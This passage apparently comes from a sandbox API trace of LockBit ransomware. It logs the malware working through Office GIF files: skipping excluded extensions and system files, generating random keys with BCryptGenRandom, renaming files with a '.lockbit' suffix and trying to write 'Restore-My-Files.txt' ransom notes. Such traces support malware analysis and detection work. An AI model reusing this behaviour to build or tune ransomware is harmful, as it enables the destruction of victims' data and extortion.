lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.850] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.850] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15021_.GIF.lockbit") returned 78 [0203.850] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15021_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15021_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.852] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.852] malloc (_Size=0x40068) returned 0x3df0008 [0203.852] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=74) returned 1 [0203.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.853] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.853] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.855] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15021_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15021_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.855] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.855] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.856] free (_Block=0x1fa2ed8) [0203.856] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15021_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.856] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.856] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.856] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817a8200, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbca82e00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x817a8200, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15022_.GIF", cAlternateFileName="")) returned 1 [0203.856] lstrcmpiW (lpString1=".", lpString2="BD15022_.GIF") returned -1 [0203.856] lstrcmpiW (lpString1="..", lpString2="BD15022_.GIF") returned -1 [0203.856] PathFindExtensionW (pszPath="BD15022_.GIF") returned=".GIF" [0203.856] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.856] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.856] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.856] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.856] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.856] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.856] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.856] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.856] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.856] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.856] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.856] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.857] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.857] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.857] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.857] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15022_.GIF") returned 1 [0203.857] lstrcmpiW (lpString1="ntldr", lpString2="BD15022_.GIF") returned 1 [0203.857] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15022_.GIF") returned 1 [0203.857] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15022_.GIF") returned 1 [0203.857] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15022_.GIF") returned -1 [0203.857] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15022_.GIF") returned 1 [0203.857] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15022_.GIF") returned 1 [0203.857] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.857] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15022_.GIF") returned=".GIF" [0203.857] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.857] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.858] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.858] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.858] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15022_.GIF.lockbit") returned 78 [0203.858] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15022_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15022_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.860] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.860] malloc (_Size=0x40068) returned 0x3df0008 [0203.860] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=97) returned 1 [0203.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.861] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.864] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15022_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15022_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.864] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.864] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.864] free (_Block=0x1fa2ed8) [0203.864] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15022_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.864] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.864] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.864] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80495500, ftCreationTime.dwHighDateTime=0x1bd4f41, ftLastAccessTime.dwLowDateTime=0xbca82e00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x80495500, ftLastWriteTime.dwHighDateTime=0x1bd4f41, nFileSizeHigh=0x0, nFileSizeLow=0x7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15023_.GIF", cAlternateFileName="")) returned 1 [0203.864] lstrcmpiW (lpString1=".", lpString2="BD15023_.GIF") returned -1 [0203.864] lstrcmpiW (lpString1="..", lpString2="BD15023_.GIF") returned -1 [0203.864] PathFindExtensionW (pszPath="BD15023_.GIF") returned=".GIF" [0203.865] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.865] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.865] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15023_.GIF") returned 1 [0203.866] lstrcmpiW (lpString1="ntldr", lpString2="BD15023_.GIF") returned 1 [0203.866] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15023_.GIF") returned 1 [0203.866] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15023_.GIF") returned 1 [0203.866] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15023_.GIF") returned -1 [0203.866] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15023_.GIF") returned 1 [0203.866] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15023_.GIF") returned 1 [0203.866] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.866] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15023_.GIF") returned=".GIF" [0203.866] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.866] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.866] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.867] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.867] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.867] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.867] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15023_.GIF.lockbit") returned 78 [0203.867] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15023_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15023_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.868] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.868] malloc (_Size=0x40068) returned 0x3df0008 [0203.868] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=122) returned 1 [0203.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.869] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.873] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15023_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15023_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.873] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.873] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.873] free (_Block=0x1fa2ed8) [0203.873] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15023_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.873] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.873] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.873] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95f37700, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcaa8f60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x95f37700, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xda, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15056_.GIF", cAlternateFileName="")) returned 1 [0203.873] lstrcmpiW (lpString1=".", lpString2="BD15056_.GIF") returned -1 [0203.873] lstrcmpiW (lpString1="..", lpString2="BD15056_.GIF") returned -1 [0203.873] PathFindExtensionW (pszPath="BD15056_.GIF") returned=".GIF" [0203.873] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.873] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.873] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.873] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.873] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.873] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.873] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.873] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.873] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.873] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.873] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.873] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.873] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.873] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.873] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.873] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.873] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.873] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.873] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.873] 